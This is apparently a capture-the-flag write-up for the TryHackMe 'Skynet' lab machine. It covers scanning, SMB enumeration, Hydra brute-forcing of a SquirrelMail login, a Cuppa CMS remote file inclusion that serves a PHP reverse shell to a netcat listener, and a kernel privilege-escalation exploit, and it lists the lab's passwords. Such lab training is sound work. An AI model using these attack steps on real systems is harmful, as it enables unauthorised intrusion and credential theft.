TryHackMe Skynet is a vulnerable Terminator themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attack samba share, RFI attacks and privilege escalation.

TreyHackMe SkyNet WriteUp
TryHackMe SkyNet WriteUp

Start the Machine

Before everything we need to start our machine and wait around a minute to start our recon phase. After the machine is up and running it’s time to scan the box.

Scan the Target Machine

To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.

nmap -sV -sC -A -p-

Analyse Nmap Scan results

After running the nmap scan I notice a few open ports and four main services – SSH , Apache, Dovecot, Samba.

TryHackMe SkyNet
tryhackme nmap scan skynet
  • 22/tcp SSH
  • 80/tcp HTTP
  • 110/tcp POP3
  • 139/tcp NetBIOS Samba
  • 143/tcp IMAP
  • 445/tcp NetBIOS Samba

Investigate Port 80 Apache/2.4.18

Open you browser with your Skynet Box IP and a skynet dummy search engine appear

TryHackMe SkyNet
TryHackMe Skynet Writeup Port 80 Dummy Search engine

I have tried search something but nothing happen. Analyzing the HTML code I can’t find nothing relevant!

TryHackMe SkyNet
html code

At this point we get nothing from the Webserver it’s time to search some folders and find something useful to explore.

Execute gobuster

To find new folders on the webserver I will use gobuster with a public list.

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
TryHackMe SkyNet

After running the gobuster we got some useful folders to investigate but only one can be open, the squirrelmail folder!

Info to Explore

  • folder squirrelmail

Investigate Dovecot

Open the browser and access the squirrelmail folder it will open a login page and show us the SquirrelMail version 1.4.23
TryHackMe SkyNet Squirrelmail
TryHackMe SkyNet Squirrelmail

At this point we have the version of squirrel service and a login page but no clue of any username or email I’ve try some basic SQLi but without success. It’s time try the next service available Samba.

Investigate Samba

To investigate the Samba service I usually use the SMBMap tool or Nmap.

smbmap -H
TryHackMe SkyNet
SMBMap skynet

After executing smbmap we got some juicy info, we can Read the anonymous share and there is a interesting share with the name milesdyson but we don’t have access to it.

Wait? milesdyson sound like a username for me, maybe can be used on Squirrelmail login page. keep it in mind for now I will investigate the anonymous share maybe I can find some useful file.

Connect to anonymous Share

For now let’s connect to the anonymous share with SMBClient using the command:

smbclient //

We are in let’s list the files available and search…

TryHackMe SkyNet
Anonyous share output

We have one file and one folder to investigate.

cat attention.txt
TryHackMe SkyNet
attention.txt file output

We can confirm our suspects the user Miles Dyson exists.

TryHackMe SkyNet
log1.txt output

Log1.txt file looks like a password list file and maybe can be used as a wordlist to bruteforce the squirrelemail login page, let’s try it.

Brute force Squirrel login with Hydra

Here we will test the milesdyson as username a log1.txt file as a wordlist.

hydra -l milesdyson -P log1.txt http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u
TryHackMe SkyNet
Brute force Squirrel login

After a successful brute force attack against squirrel we can login with user milesdyson and password cyborg007haloterminator

TryHackMe SkyNet
Squirrel Dashboard

Open first email and extract Samba password

TryHackMe SkyNet
TryHackMe Skynet Samba Password

Connect to milesdyson Share

smbclient // -U milesdyson

Insert the Password-> )s{A&2Z=F^n_E.B`
TryHackMe SkyNet
Read Samba Share MilesDyson
TryHackMe SkyNet

Only PDF files and a folder called notes let’s list it

TryHackMe SkyNet

One file looks interesting important.txt

TryHackMe SkyNet
TryHackMe SkyNet
read important.txt file

The important.txt file mention some new directory /45kra24zxs28v3yd open it and we have the Miles Dyson homepage.

TryHackMe SkyNet
Miles Dyson Personal Page

gobuster o find this administrator page

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
TryHackMe SkyNet
TryHackMe SkyNet

Cuppa CMS Exploit

Find some useful exploit to run on Cuppa CMS

searchsploit cuppa
TryHackMe SkyNet
Cuppa CMS Exploit

Select Reverse Shell

Here I will copy the PHP Reverse Shell into my homefolder and then start a python webserver to

cp /usr/share/webshells/php/php-reverse-shell.php ~

Change the webshell values IP and Port if needed.

TryHackMe SkyNet
Edit PHP reverse Shell
cd /home/user
python3 -m http.server 801

Open a new terminal and use netcat or metasploit o listen on port 1234

nc -l 1234
cd milesdyson
cat user.txt
TryHackMe SkyNet

Our session is limited to the user webserver is running www-data, we need to find a way to elevate privileges but before that let’s brute force the Samba share milesdyson.

Brute Force Samba Service

hydra -l milesdyson -P log1.txt smb -V

No success brute forcing the milesdyson share, OK let’s be more intrusive.

Privilege Escalation

Using Exploit

Search exploit to out kernel version

searchsploit kernel 4.8.0
TryHackMe SkyNet
search kernel exploit
TryHackMe SkyNet

Using Crontab

Root Flag

cat /root/root.txt

Answer Questions

Now its time to answer the CTF questions

Skynet Questions
Skynet Questions

What is Miles password for his emails?


What is the hidden directory?


What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

What is the user flag?


What is the root flag?


Linux Kernel 4.8.0 UDEV < 232 – Local Privilege Escalation

Register TryHackMe HERE